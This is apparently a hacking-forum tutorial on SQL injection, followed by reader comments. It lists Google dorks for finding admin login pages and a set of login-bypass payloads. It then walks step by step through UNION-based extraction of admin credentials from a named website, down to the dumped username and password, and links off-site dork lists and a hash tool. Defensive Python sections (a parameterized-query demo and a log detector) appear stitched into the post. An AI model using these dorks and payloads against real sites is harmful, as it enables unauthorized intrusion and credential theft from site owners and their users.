Introduction:
Hello everyone.
I am going to share one of the best of my tutorials here.
Now let's begin!!
SQL injection (aka SQLi or Structured Query Language injection) is the first step in the entry to exploiting or hacking websites. It is easily done and it is a great starting-off point. Unfortunately most SQLi tutorials suck, so that is why I am writing this one. SQLi is basically injecting queries into a database or using queries to get authorization bypass as an admin.
Things you should know:
Data is in the columns, the columns are in tables, and the tables are in the database.
Just remember that so you understand the rest.
PART 1
Bypassing admin login
Gaining auth bypass on an admin account.
Most sites vulnerable to this are .asp
First we need to find a site; start by opening Google.
Now we type our dork. Definition of "dork": a search entry for a certain type of site/exploit, etc.
There is a large number of Google dorks for basic SQL injection.
Here are the best:
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
The site should look something like this:
ADMIN USERNAME :
PASSWORD :
So what we do here is: in the username we always type "Admin",
and for our password we type our SQL injection.
Here is a list of SQL injections:
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
username:Admin
password:'or'1'='1
That will confuse the site and give you authorisation to enter as admin.
If the site is vulnerable then you are in :D
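Why a payload from the list above gets through, and what stops it, shown as an added example that is not code from the original post: a login check that builds its SQL by string concatenation next to the same check with bound parameters. The table, column names and stored credentials are constructed for the demo, and an in-memory SQLite database stands in for the site's database.

```python
import sqlite3

# Constructed demo data: table, columns and credentials are assumptions.
# (A real application would store a password hash; plaintext keeps this short.)
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins (username TEXT, password TEXT)")
    db.execute("INSERT INTO admins VALUES ('Admin', 'correct-horse')")
    return db

def build_vulnerable_query(username, password):
    # User input is pasted straight into the SQL text.
    return ("SELECT COUNT(*) FROM admins WHERE username = '" + username +
            "' AND password = '" + password + "'")

def login_vulnerable(db, username, password):
    # A quote in the input ends the string literal; what follows runs as SQL.
    return db.execute(build_vulnerable_query(username, password)).fetchone()[0] > 0

def login_parameterized(db, username, password):
    # Placeholders keep the input as data; its quotes never reach the SQL parser.
    row = db.execute(
        "SELECT COUNT(*) FROM admins WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] > 0

PAYLOAD = "' or '1'='1"  # first entry of the list above

if __name__ == "__main__":
    db = make_db()
    # The WHERE clause becomes: (username = 'Admin' AND password = '') or '1'='1'
    print(build_vulnerable_query("Admin", PAYLOAD))
    print("vulnerable, payload:   ", login_vulnerable(db, "Admin", PAYLOAD))
    print("parameterized, payload:", login_parameterized(db, "Admin", PAYLOAD))
    print("parameterized, real pw:", login_parameterized(db, "Admin", "correct-horse"))
```
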
PART 2
Finding Sites to Inject
Finding SQLi-vulnerable sites is extremely easy; all you need to do is some googling. The first thing you need to do is find some dorks.
Download SQLI dorks list from here : http://www.mediafire.com/?y7v30lcj0kn8836
http://adf.ly/cjpJ <--- password is somewhere in it
PS: I didn't put them in the thread because I passed the count limit...
Pick one of those dorks and add inurl: before it (if it does not already have it), then copy and paste it into Google. Pick one of the sites off Google and go to it.
For example, the URL of the page you are on may look like this:
Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10
To check that it is vulnerable, all you have to do is add a '
So our link should look like this:
Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=10'
Press enter and you get some kind of error. The errors will vary...
Our link should look like this:
Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 15--
If you get an error, that means you should lower the number of columns.
Let's try 10.
Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 10--
The page opened normally; that means the number of columns is between 10 and 14.
We try now 11.
Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 11--
The page opened normally too...
Let's try 12.
Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 12--
We got an error. That means the number of columns is 11, because we got an error on 12 and 11 opened normally.
Finding Accessible Columns
Now that we have the number of columns, we need to get the column numbers that we can grab information from.
We can do that by adding a "-" before the "10" and replacing " order by # " with " union all select " and the column numbers.
Our link should look like this:
Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,8,9,10,11--
We should get numbers.
For the end part of the URL (1,2,3,4,5,6,7,8,9,10,11), you put the number of columns you found in the first step. Since I found that the site I was testing had 11 columns, I put 1,2,3,4,5,6,7,8,9,10,11--
These numbers are the column numbers we can get information from. We will replace them later with something else, so write them down if you want.
Getting Database Version
We found that columns 8, 3, 4 and 5 are vulnerable, so we will use them to get the database version.
Why Do We Do That?
If the database version is under 5, that means we will have to guess the table names.
To do that we need to replace one of the vulnerable columns with "@@version".
Let's take column 8.
Our link should look like this:
Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,@@version,9,10,11--
In our case we got "5.0.77"; it's >5 so we can continue.
Now we need to get the table name we want to access:
To do it we need to replace "@@version" with "table_name", add "from information_schema.tables" after the last column number, and add the "--" at the end.
Link should be like this:
Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,table_name,9,10,11 from information_schema.tables--
Now we will search for the table we want to access.
We should find something with admin in it, and in our case it's tbladmin.
Now we need to get the ASCII value of "tbladmin".
What is ASCII?
http://en.wikipedia.org/wiki/ASCII_value
Now to get the ASCII value of "tbladmin", go to this site: http://getyourwebsitehere.com/jswb/text_to_ascii.html
Now enter the table name, which is "tbladmin" in our case, in the first box and click convert to ASCII.
You will get this as the value:
tbladmin
It should be like this:
116,98,108,97,100,109,105,110
Now in the URL we replace "table_name" with "column_name", change "information_schema.tables" to "information_schema.columns" and add "where table_name=char(ASCII value)--"
In our case, in place of (ASCII value) we put (116,98,108,97,100,109,105,110)--
Our URL should look like this:
Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,column_name,9,10,11 from information_schema.columns where table_name=char(116,98,108,97,100,109,105,110)--
Our page should be like that:
Now we search for the columns named "username" and "password" or something like that.
In our case it is "username" and "password".
Now we can delete most of the URL.
Remove everything after the 11 and add "from tbladmin", and replace "column_name" with "concat(username,0x3a,password)".
0x3a is the ASCII value of a : so we can separate the username from the password.
Our URL should look like this:
Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,concat(username,0x3a,password),9,10,11 from tbladmin
Our page should look like that:
And you're done: the username is ishir and the password is ishir123.
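From the defender's side, each stage of the walkthrough above leaves a recognisable request in the web server's access log. The following added example (not part of the original post) flags those stages in request URLs and decodes any char(...) list so an analyst can see which table name was being targeted; the sample requests are constructed and the stage labels are hypothetical names chosen for this sketch.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# One pattern per stage of the walkthrough above (all case-insensitive).
STAGES = [
    ("column-count probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union select",       re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("version read",       re.compile(r"@@version", re.I)),
    ("schema enumeration", re.compile(r"\binformation_schema\.", re.I)),
    ("char() encoding",    re.compile(r"\bchar\s*\(\s*\d+(\s*,\s*\d+)*\s*\)", re.I)),
    ("concat dump",        re.compile(r"\bconcat\s*\(", re.I)),
]
CHAR_CALL = re.compile(r"char\s*\(([\d\s,]+)\)", re.I)

def decode_char_calls(text):
    """Turn char(116,98,...) into the string it hides, for the analyst."""
    out = []
    for m in CHAR_CALL.finditer(text):
        codes = [int(c) for c in m.group(1).split(",") if c.strip()]
        out.append("".join(chr(c) for c in codes if c < 0x110000))
    return out

def inspect_request(url):
    """Return (stage names, decoded char() strings) for one request URL."""
    hits, decoded = [], []
    for _name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        # parse_qsl has already percent-decoded the value and turned + into space
        for stage, pattern in STAGES:
            if pattern.search(value) and stage not in hits:
                hits.append(stage)
        decoded += decode_char_calls(value)
    return hits, decoded

# Constructed sample requests (path only; no real log data).
SAMPLE = [
    "/newsdetail.php?id=10",
    "/newsdetail.php?id=10%20order%20by%2012--",
    "/newsdetail.php?id=-10+union+all+select+1,2,3,4,5,6,7,@@version,9,10,11--",
    "/newsdetail.php?id=-10%20union%20all%20select%201,2,3,4,5,6,7,column_name,9,10,11"
    "%20from%20information_schema.columns%20where%20table_name="
    "char(116,98,108,97,100,109,105,110)--",
]

if __name__ == "__main__":
    for url in SAMPLE:
        print(inspect_request(url), url[:60])
```

Keyword matching like this is for spotting probes in logs, not for blocking them; the fix for the page itself is to bind id as a query parameter or reject any value that is not an integer.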
Sometimes the password is encrypted with hashes.
Use my HASH detector to know what it is and decrypt online.
http://www.mediafire.com/?7qd7t6r3b13ccq4
http://adf.ly/cjpJ <---- the password is in it somewhere :)
And we're done!
I hope you liked my tutorial.
ALL credits go to me!
Thanks for reading that thread.
3:48 PM
Avais,Haseeb
26 comments:
Amazing! I did not read such a good tutorial first
Thanks a lot
Good stuff, but when trying to access via FTP with the user pw, it doesn't accept them...
Thanks for such nice comments
but how I'm going to find the admin panel????????
636f6c6c6174696f6e i got this after converting the text now what to do m confused.......
awe
http://www.mediafire.com/?y7v30lcj0kn8836
this file password....???